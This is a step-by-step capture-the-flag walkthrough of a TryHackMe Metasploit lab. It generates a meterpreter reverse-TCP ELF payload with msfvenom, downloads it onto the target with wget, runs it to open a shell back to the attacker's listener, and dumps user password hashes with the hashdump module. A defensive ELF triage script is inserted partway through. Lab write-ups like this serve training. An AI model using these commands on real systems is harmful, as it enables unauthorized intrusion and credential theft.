Msfvenom

https://tryhackme.com/room/metasploitexploitation task 6

This is a step-by-step walkthrough of task 6 of Metasploit: Exploitation - Msfvenom.

Step 1 - Accessing the Target Machine

We're given credentials to ssh into the target machine. As you can see in the picture, I have 4 tabs open (CTRL+SHIFT+T opens a new tab). For each step I'll give the commands to execute, a comment explaining what each command does, and a screenshot where I'm doing the same thing. I recommend having 4 named and coloured tabs like I do; in my opinion it makes the whole process easier to follow. Any text after # is a comment and is shown in grey.

# In the Target Machine tab
# Use command ssh to connect to the target machine
ssh murphy@10.10.148.173
# When prompted, type yes to continue connecting
yes
# Enter password 
1q2w3e4r
# Type sudo su to get a root shell, this will give you privileges
sudo su
# Enter password again
1q2w3e4r
step 1 - Target Machine tab

Step 2 - Creating a reverse TCP shell Payload

# In the Attack Machine tab (green)
# Check port 7777 is not being used by any service. This isn't necessary, it's just a precaution
lsof -i :7777 # If port isn't used, nothing will happen. 
# Create a reverse_tcp payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.21.156.82 LPORT=7777 -f elf > rev_shell.elf
step 2 - Attack Machine

Step 3 - Creating a server

In the Server tab we start a simple Python HTTP server.

# In the Server tab
# Check port 9000 is not in use. This isn't necessary, it's just a precaution
lsof -i :9000 # If port isn't used, nothing will happen.
# Start the server with this command
python3 -m http.server 9000
step 3 - Server Tab

Step 4 - Transferring the payload

Download the payload from the server you set up in the last step.

# In the Target Machine tab
# Download the payload in the Target Machine from the server using this command
wget http://10.21.156.82:9000/rev_shell.elf
# Use the chmod command to assign executable permissions
chmod +x rev_shell.elf
step 4 - Target Machine tab

In the Server tab, you'll see the successful GET request. No need to do anything here; it just confirms the download was successful.

step 4 - Server tab
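
From the defender's side, a file that arrives over HTTP and is then marked executable, as in this step, is worth a quick static look before anything runs it. The following is an added example, not part of the original walkthrough or of Metasploit: it parses the ELF header and program headers and flags two layout traits that are unusual for compiler-built binaries (no section header table, and a load segment that is both writable and executable). The function names, finding labels and the sample bytes are assumptions constructed for illustration.

```python
import struct

PT_LOAD, PF_X, PF_W = 1, 0x1, 0x2

def triage_elf(data: bytes) -> list:
    """Return static triage findings for an ELF image ([] = nothing flagged)."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return ["not-elf"]
    is64 = data[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if data[5] == 1 else ">"       # EI_DATA: 1 = little-endian
    if is64 and len(data) < 64:
        return ["truncated-header"]
    hdr = struct.unpack_from(
        end + ("HHIQQQIHHHHHH" if is64 else "HHIIIIIHHHHHH"), data, 16)
    phoff, phentsize, phnum, shnum = hdr[4], hdr[8], hdr[9], hdr[11]
    findings = []
    if shnum == 0:
        # Compiler/linker output normally keeps a section header table.
        findings.append("no-section-headers")
    ph_fmt = end + ("IIQQQQQQ" if is64 else "IIIIIIII")
    flags_idx = 1 if is64 else 6             # p_flags position differs by class
    for i in range(phnum):
        off = phoff + i * phentsize
        if off + struct.calcsize(ph_fmt) > len(data):
            findings.append("truncated-program-header")
            break
        ph = struct.unpack_from(ph_fmt, data, off)
        if ph[0] == PT_LOAD and ph[flags_idx] & PF_W and ph[flags_idx] & PF_X:
            findings.append("writable-executable-load-segment")
    return findings

def build_sample(p_flags: int, shnum: int) -> bytes:
    """Constructed 32-bit x86 ELF header plus one PT_LOAD entry (not a runnable program)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
    ehdr = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048054, 52,
                       84 if shnum else 0, 0, 52, 32, 1, 40, shnum, 0)
    phdr = struct.pack("<IIIIIIII", 1, 0, 0x08048000, 0x08048000,
                       84, 84, p_flags, 0x1000)
    return ident + ehdr + phdr

if __name__ == "__main__":
    print(triage_elf(build_sample(p_flags=7, shnum=0)))  # constructed unusual layout
    print(triage_elf(build_sample(p_flags=5, shnum=1)))  # constructed ordinary layout
```

These are triage hints, not verdicts: legitimate packed or stripped binaries can trip them, so treat a finding as a reason to inspect the file further.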

Step 5 - Setting up a Payload Handler

In the Msfconsole tab we'll configure and run the payload handler.

# In the Msfconsole tab
# Start Metasploit Console
msfconsole
use linux/x86/meterpreter/reverse_tcp
show options
set lhost 10.21.156.82
set lport 7777
exploit
step 5 - Msfconsole tab

Step 6 - Executing the Payload

# In the Target Machine tab
# Execute the payload
./rev_shell.elf
Step 6 - Target Machine tab

In the Msfconsole tab we select the linux/gather/hashdump module, configure it and run it.

# In the Msfconsole tab
# Use post exploitation module to dump hashes of users on the system
use linux/gather/hashdump
# See the options
show options
# Check for session id
sessions
# Set the correct session id
set session 1
# Run it
exploit
# See the usernames:hashes
Step 6 - Msfconsole tab

Step 7 - Success

We're done
